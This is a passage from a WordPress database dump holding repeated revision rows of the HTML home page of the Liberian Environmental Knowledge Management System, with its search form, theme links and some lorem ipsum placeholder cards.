<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:56:13','2019-11-09 16:56:13','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(537,1,'2019-11-09 17:01:21','2019-11-09 17:01:21','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Knowledge Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Knowledge Resource</option>\n	<option value=\"90\">Themes</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 17:01:21','2019-11-09 17:01:21','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(538,1,'2019-11-09 17:05:59','2019-11-09 17:05:59','','MEA Resources','','publish','closed','closed','','mea_resource','','','2019-11-16 11:13:31','2019-11-16 11:13:31','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=538',0,'_pods_pod','',0),(539,1,'2019-11-09 19:24:35','2019-11-09 19:24:35','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Knowledge Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Knowledge Resource</option>\n	<option value=\"90\">Themes</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n		<h5>Card #1</h5>Lorem ipsum dolor sit amet, mea ei viderer probatus consequuntur, sonet vocibus lobortis has ad. Eos erant indoctum an, dictas invidunt est ex, et sea consulatu torquatos. Nostro aperiam petentium eu nam, mel debet urbanitas ad, idque complectitur eu quo. An sea autem dolore dolores.	\n		<h5>Card #2</h5>Lorem ipsum dolor sit amet, mea ei viderer probatus consequuntur, sonet vocibus lobortis has ad. Eos erant indoctum an, dictas invidunt est ex, et sea consulatu torquatos. Nostro aperiam petentium eu nam, mel debet urbanitas ad, idque complectitur eu quo. An sea autem dolore dolores.	\n		<h5>Card #3</h5>Lorem ipsum dolor sit amet, mea ei viderer probatus consequuntur, sonet vocibus lobortis has ad. Eos erant indoctum an, dictas invidunt est ex, et sea consulatu torquatos. Nostro aperiam petentium eu nam, mel debet urbanitas ad, idque complectitur eu quo. An sea autem dolore dolores.	\n		<h5>Card #4</h5>Lorem ipsum dolor sit amet, mea ei viderer probatus consequuntur, sonet vocibus lobortis has ad. Eos erant indoctum an, dictas invidunt est ex, et sea consulatu torquatos. Nostro aperiam petentium eu nam, mel debet urbanitas ad, idque complectitur eu quo. An sea autem dolore dolores.	\n	Thursday, August 31, 2018\n	Thursday, August 29, 2018\n	Thursday, August 28, 2018\n	Thursday, August 27, 2018\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:24:35','2019-11-09 19:24:35','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(541,1,'2019-11-09 19:45:20','2019-11-09 19:45:20','','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 19:45:20','2019-11-09 19:45:20','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(542,1,'2019-11-09 19:46:49','2019-11-09 19:46:49','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Knowledge Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Knowledge Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">		\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:46:49','2019-11-09 19:46:49','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(543,1,'2019-11-09 19:47:40','2019-11-09 19:47:40','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">		\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:47:40','2019-11-09 19:47:40','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(544,1,'2019-11-09 19:50:03','2019-11-09 19:50:03','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">		\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:50:03','2019-11-09 19:50:03','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(545,1,'2019-11-09 19:52:26','2019-11-09 19:52:26','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island 